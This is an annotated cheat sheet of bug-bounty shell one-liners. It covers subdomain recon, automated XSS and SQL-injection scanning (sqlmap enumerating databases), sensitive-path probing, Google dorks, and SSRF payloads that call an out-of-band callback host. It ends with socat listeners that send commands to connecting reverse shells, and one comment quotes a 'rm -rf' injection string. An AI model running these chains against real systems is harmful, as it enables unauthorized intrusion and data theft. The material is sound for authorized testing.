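# 1. Extract the URLs that answered with HTTP 200:
# `grep 200` alone is a substring match and also hits a "200" inside a
# hostname or a content length, so match it as a whole word instead.
# Column 5 is assumed to be the URL in urlprobe's output — verify against
# the installed urlprobe version before trusting lol-200.txt.
urlprobe -c 1000 -t 01 < hosts | grep -w 200 | awk '{print $5}' | tee -a lol-200.txt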
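# 2. Automated XSS scanning:
# Pull archived URLs for every subdomain, keep only those that carry a
# query string, drop static assets, and feed the rest to dalfox.
waybackurls < subdomains.txt >> wayback.txt
# `egrep` is deprecated (use `grep -E`). In the original filter the `.` was
# unescaped (matched any character) and the extension list was unanchored,
# so a parameter such as `?file=x.json` was thrown away because ".js" is a
# prefix of ".json". The extension is now required to end the path, i.e. to
# be followed by `?`, `#`, or end of line.
cat spider.txt wayback.txt | grep "=" | grep -Eiv '\.(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt|js)([?#]|$)' | dalfox pipe -o xss_results.txt --multicast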
# 3. Subdomain enumeration, port probing and liveness check in one chain
# (Windows-style `.\` binary paths as in the original; use `./` on
# Linux/macOS). A trailing `|` continues the line in both bash and
# PowerShell.
.\subfinder -d baidu.com |
  .\ksubdomain -verify -silent |
  .\naabu -top-ports 100 -silent |
  .\httpx -silent -title -status-code
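# 4. Compute a favicon hash for favicon recon (mmh3 over the base64-encoded
# file, the form used by Shodan-style `http.favicon.hash` searches):
# `-f` makes curl fail on an HTTP error instead of piping an error page into
# the hash, and the script refuses an empty body so a failed download does
# not print the hash of "". `-k` (disable certificate verification) was
# dropped: it is not needed for a public host; add it back only when the
# target really uses a self-signed certificate. Requires the `mmh3` package.
curl -sfL https://gitlab.com/favicon.ico | python3 -c 'import mmh3,sys,codecs; d=sys.stdin.buffer.read(); assert d, "empty favicon"; print(mmh3.hash(codecs.encode(d,"base64")))'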
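# 5. Find SQL injection (command chain):
# `anew` (already used elsewhere on this page) appends only lines that are
# not yet in the file, so re-running the chain does not pile up duplicates
# that sqlmap would then test again. `tee -a` appended unconditionally.
subfinder -d target.com | anew domains
httpx < domains | anew urls.alive
waybackurls < urls.alive | anew urls.check
gf sqli urls.check | anew urls.sqli
# `--batch` answers every sqlmap prompt with its default. `--dbs` enumerates
# database names, which goes beyond demonstrating the injection — make sure
# that is covered by the engagement's authorization before running it.
sqlmap -m urls.sqli --dbs --batch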
# 6. Quick sensitive-information probing with httpx (status code and body
# length make real hits stand out from generic error pages):
# Status page (commonly Apache mod_status) with the full report.
httpx -path '/server-status?full=true' -status-code -content-length < hosts.txt
# Web console path, checked across the usual application-server ports.
httpx -ports 80,443,8009,8080,8081,8090,8180,8443 -path /web-console/ -status-code -content-length < hosts.txt
# Leftover phpinfo() page; the title helps confirm a genuine hit.
httpx -path /phpinfo.php -status-code -content-length -title < hosts.txt
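# 7. Collect hostnames with gospider:
# The original passed `-d` twice (`-d 0` = unlimited depth, then `-d 5`).
# With gospider's flag parser the last occurrence wins, so only `-d 5` is
# kept here to make the effective depth explicit — raise it (or use 0) if
# you really want unlimited recursion.
gospider -s "https://site.com" -c 5 -t 100 -d 5 --blacklist jpg,jpeg,gif,css,tif,tiff,png,ttf,woff,woff2,ico,pdf,svg,txt | grep -Eo '(http|https)://[^/"]+' | anew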
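# 8. Find subdomains via GitHub code search, then probe them with httpx:
# Read the API token from the environment instead of pasting it into the
# command: the literal `$GITHUB_TOKEN` is what lands in shell history and in
# copied notes. (The tool only takes the token as an argument, so it is
# still visible in `ps` output while it runs.)
./github-subdomains.py -t "$GITHUB_TOKEN" -d domaintosearch | httpx --title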
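# 9. Extract URLs from an APK:
# PCRE: a URL scheme followed by URL characters, stopped by (but not
# including) the closing quote. The original class `[\w\.-/]` contained the
# range `.-/`, which covers only `.` and `/` — so the hyphen was NOT allowed
# and every URL with a hyphenated hostname was silently dropped. The quote
# is now a lookahead, so the `sed 's#"##g'` cleanup (which only stripped `"`
# and left `'` and backticks behind) is no longer needed.
url_re='https?://[\w./-]+(?=["'"'"'`])'
apktool d app.apk -o uberApk
grep -Phro "$url_re" uberApk/ | anew | grep -v "w3\|android\|github\|schemas.android\|google\|goo.gl"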
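# 10. Vulnerability scanning with Shodan and Nuclei:
# The domain placeholder must be a single argument — the original
# "DOMAIN TO BOUNTY" would have been passed to shodan as three words.
# Column 3 of `shodan domain` output is assumed to be the record value
# (IP or CNAME target); check that against your shodan CLI version.
shodan domain target.com | awk '{print $3}' | httpx -silent | nuclei -t /nuclei-templates/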
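# 11. Extract paths from a JS file:
# PCRE: a quoted string (", ' or backtick) that starts with `/`, captured
# without the quotes via lookbehind/lookahead. `-a` forces text mode for
# minified bundles that grep would otherwise treat as binary.
# The useless `cat file.js |` was dropped; grep reads the file directly.
path_re='(?<=["'"'"'`])/[a-zA-Z0-9_?&=/#.-]*(?=["'"'"'`])'
grep -aoP "$path_re" file.js | sort -u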
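# 12. Collect JS files from live hosts with gospider:
# The host names in `pay` are untrusted recon output. The original spliced
# them straight into the `sh -c` command string with `-I@`, so a line such
# as `x;rm -rf ~` would have been executed by sh. Each host is now passed as
# a positional parameter (`_` fills $0) and referenced as "$1" inside the
# script, which is never re-parsed as shell code.
# `-P 500` parallel connects is very aggressive — tune it to the target.
xargs -P 500 -a pay -I@ sh -c 'nc -w1 -z -v "$1" 443 2>/dev/null && echo "$1"' _ @ \
  | xargs -I@ -P10 sh -c 'gospider -a -s "https://$1" -d 2 | grep -Eo "(http|https)://[^/\"].*\.js+" | sed "s#\] \- #\n#g" | anew' _ @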
# 13. @Wh11teW0lf: content-discovery tip for Java-based servers (*.jsp,
# *.jspa, ...) — never forget servlets!
ffuf -u https://example.com/FUZZServlet -w words.txt
# ffuf host collision (virtual-host discovery); an alternative tool is
# https://github.com/fofapro/Hosts_scan
ffuf -u https://target/FUZZ -w /path/to/wordlist
# Fuzz the Host header. `-fs 4242` is a placeholder: set it to the body
# size of the default vhost's response so only differing answers are shown.
ffuf -u https://target -w /path/to/vhost/wordlist -H "Host: FUZZ" -fs 4242
# Same directory fuzz, capped at 60 seconds of total runtime.
ffuf -u https://target/FUZZ -w /path/to/wordlist -maxtime 60
# 14. Useful Google dorks (replace `company` with the target's name; the
# `site:` operator takes a bare hostname, not a URL with a scheme):
site:repl.it intext:company
site:zoom.us inurl:company
site:atlassian.net inurl:company
site:s3.amazonaws.com inurl:company
site:pastebin.com inurl:company
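# 15. Look up the IPv4 prefixes registered for an AS number (AS36459 here):
# `uniq` only collapses *adjacent* duplicates, so a prefix repeated further
# down the whois output survived; `sort -u` de-duplicates globally.
# IPv6 (`route6:`) prefixes are not matched by this pattern.
cidr_re='[0-9]+(\.[0-9]+){3}/[0-9]+'
whois -h whois.radb.net -- '-i origin AS36459' | grep -Eo "$cidr_re" | sort -u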
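# 16. SSRF hunting with SSRFire (`-s` is your out-of-band callback host):
./ssrfire.sh -d http://domain.com -s http://pingburl
# Replace every query-string value with the callback URL (the useless
# `cat urls.txt |` was dropped). All URLs receive the same canary, so a hit
# cannot be attributed to a specific request — use a unique path per URL
# if attribution matters.
qsreplace http://pingb.in/p/xyz < urls.txt >> ssrfs.txt
# Each line of ssrfs.txt is a complete URL, so FUZZ is the whole -u value.
ffuf -u "FUZZ" -w ssrfs.txt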
# Then watch pingb.in (or Burp Collaborator) for incoming callbacks.
# 17. Keep listening on a port and run the commands below against every shell that connects:
# `fork` keeps the listener alive after each connection and `reuseaddr`
# lets it rebind immediately. Whatever the `SYSTEM:` command prints is sent
# to the connecting client, so a reverse shell that calls back receives
# (and executes) those lines. socat keywords are case-insensitive and
# `-d -d` equals `-dd`.
# NOTE(review): this listens on all interfaces — anyone who can reach the
# port triggers the commands. Consider `,bind=<ip>` or `,range=<cidr>` on
# the listen address to limit who can connect.
socat -v -d -d TCP-LISTEN:<port>,reuseaddr,fork SYSTEM:'echo ""'
socat -v -d -d TCP-LISTEN:444,reuseaddr,fork SYSTEM:'echo "some command";echo "exit"'
# Handy one-liners (bug bounty tips)